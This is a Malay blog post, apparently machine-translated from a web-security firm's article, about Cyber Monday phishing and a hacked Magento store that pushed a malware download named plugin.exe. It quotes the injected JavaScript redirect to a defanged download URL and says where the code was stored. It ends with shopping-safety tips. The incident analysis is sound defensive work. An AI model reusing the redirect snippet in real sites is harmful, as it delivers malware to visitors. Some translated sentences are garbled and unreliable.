Bagaimana Mengelakkan Kampanye Isnin Cyber ​​Berjimat

November 16, 2017

Oleh kerana pengguna bersedia untuk mengambil kesempatan daripada diskaun dan promosi untuk hari cuti e-commerce Black Friday dan Cyber ​​Monday, pelaku buruk sedang membuat laman web penipuan, phishing dan malware untuk memanfaatkan keuntungan.

Pada tahun-tahun yang lalu, sasaran e-mel phishing Siber hari ini menimbulkan risiko besar kepada pengguna. E-mel ini, yang direka untuk muncul dari syarikat sah atau peruncit dalam talian, seringkali dialihkan penerima ke laman web palsu di mana mereka meminta PIN atau maklumat kewangan sensitif yang lain dan berpotensi membawa kepada pencurian identiti atau transaksi penipuan.

Penipu juga menggunakan penyusupan enjin gelintar untuk menyasarkan pengguna menggunakan kata kunci seperti "tawaran Cyber ​​Monday terbaik" atau "nilai terbaik Black Friday", menyebabkan pautan berniat jahat muncul sebagai laman web otentik dalam hasil carian. Laman web palsu ini kemudian memberi kandungan yang berniat jahat kepada pengguna yang tidak curiga mencari tawaran terbaik.

Kali ini tahun lalu kita menyaksikan kemasukan yang besar dalam jumlah kejadian [[kad kredit] namun ancaman yang kita tutup hari ini berbeza dan boleh menyebabkan penyenaraian hitam semasa musim belanja musim puncak puncak.

Muat turun Malware pada Laman Web E-dagang

Semasa sambutan kejadian baru-baru ini, kami mendapati bahawa tapak Magento e-dagang telah dikompromikan dan menyampaikan perisian hasad kepada pelanggan yang cuba membeli elektronik.

Walaupun laman web kelihatan tidak bersalah pada pandangan pertama – ia tidak mengandungi spam, kandungan dewasa atau saham fail tuan rumah seperti banyak laman web yang dilancarkan malware – prestasinya jauh lebih perlahan berbanding biasa. Di samping isu-isu prestasi, sebuah pelepasan yang tidak dijangka plugin.exe telah dimuat turun sebaik sahaja halaman web dimuatkan. Tingkah laku ini adalah bendera merah untuk kompromi.

URL yang mencurigakan terletak dalam JavaScript termasuk:

  

Selepas pemeriksaan lanjut tentang potongan JavaScript, kami mendapati bahawa ia berfungsi sebagai pengalihan ke muat turun yang kami perhatikan sebelum ini, menyebabkan pengguna yang tidak menaruh harapan untuk memuat fail plugin.exe .

 proses fungsi () {window.location = "hXXps: //www.dropbox [.] com /  /plugin.exe?dl=1"; } window.onerror = process; proses () 

Sebaik sahaja halaman itu disegarkan, JavaScript termasuk hilang. Ternyata URL bersyarat yang hanya dipaparkan kepada pengguna pertama kalinya mereka menavigasi ke halaman.

Kami memuat naik plugin.exe fail ke VirusTotal untuk pemeriksaan dan keputusan itu jelas. Dengan skor 50/64, VirusTotal melaporkan pelbagai hasil yang berniat jahat untuk yang boleh dieksekusi.

Melihat cepat pada infrastruktur tapak mendedahkan sumber fail tersebut. JavaScript termasuk disimpan di dalam pangkalan data Magento dalam jadual core_config_data:

Sebaik sahaja kami mengalih keluar kod berniat jahat dari pangkalan data prestasi laman web pulih, menunjukkan bahawa peralihan ini adalah sumber laman web cukai.

Membeli-belah dengan selamat pada Cyber ​​Monday

Pelakon yang buruk mungkin meningkatkan usaha mereka untuk memanfaatkan peningkatan kempen Cyber ​​Monday, tetapi kami telah menyenaraikan beberapa petua untuk membeli-belah dalam talian selamat semasa cuti:

  • Jangan sekali-kali mengklik atau memasang fail boleh laku (.exe atau .dmg) dari sumber yang tidak diketahui. Fail ini boleh mengandungi perisian berniat jahat. Sekiranya laman web yang anda lawati meminta anda untuk memasang perisian untuk mendapatkan diskaun pada diskaun curam, jangan lakukannya
  • Dapatkan sambungan penyekat Iklan atau JavaScript pada pelayar anda. Mereka boleh membantu menghalang dan mengawal kod yang tidak diingini daripada sumber berniat jahat.
  • Menganggap bahawa pautan berbahaya sehingga disahkan Semak URL penyemak imbas anda semasa membuat pembelian untuk kesilapan atau kesilapan, dan sahkan bahawa laman web menggunakan SSL untuk menyulitkan data.
  • Tetap tandatangan antivirus yang terkini. Mereka berfungsi sebagai lapisan utama perlindungan daripada perisian yang tidak dikehendaki.
  • Elakkan mengklik pautan dalam e-mel yang tidak diminta. URL ini boleh mendarat di laman web pemalsuan yang berniat jahat atau muat turun muat turun.

Jika anda seorang pemilik laman web e-dagang dan percaya bahawa laman web anda mungkin dikompromikan, anda boleh merujuk kepada panduan hacked percuma kami untuk arahan tentang cara membersihkan laman web yang digodam . Perlu bantuan dengan laman web yang dikompromi? Kami sentiasa gembira untuk membantu !



Sumber

Bacaan WordPress Yang Lebih Menarik!

Service Finder – Provider and Business Listing WordPress Theme
Themeforest,
Themeforest,

Service Finder – Provider and Business Listing WordPress Theme

Pembuat Rojak - January 18, 2018

Perkhidmatan Pencari WordPress Tema adalah tema perniagaan dan perkhidmatan direktori yang canggih. Pembekal Perniagaan dan Perkhidmatan dari pelbagai kategori boleh…

Advanced Activity Widget
Plugins,
3 views
Plugins,
3 views

Advanced Activity Widget

Pembuat Rojak - January 18, 2018

Widget Aktiviti Lanjutan - Plugin WordPress Widget Aktiviti Lanjutan Menambah kotak widget tab bertema resposnive ke bar sisi anda yang…

Pereka Masuk Logam: Gambaran Keseluruhan Terperinci dan Kajian
Elegant Themes,
3 views
Elegant Themes,
3 views

Pereka Masuk Logam: Gambaran Keseluruhan Terperinci dan Kajian

Pembuat Rojak - January 18, 2018

Halaman log masuk WordPress mudah digunakan, dan mereka dengan selamat. Satu-satunya kelemahan adalah bahawa mereka semua melihat betul-betul yang sama…

Leave a Comment

Your email address will not be published.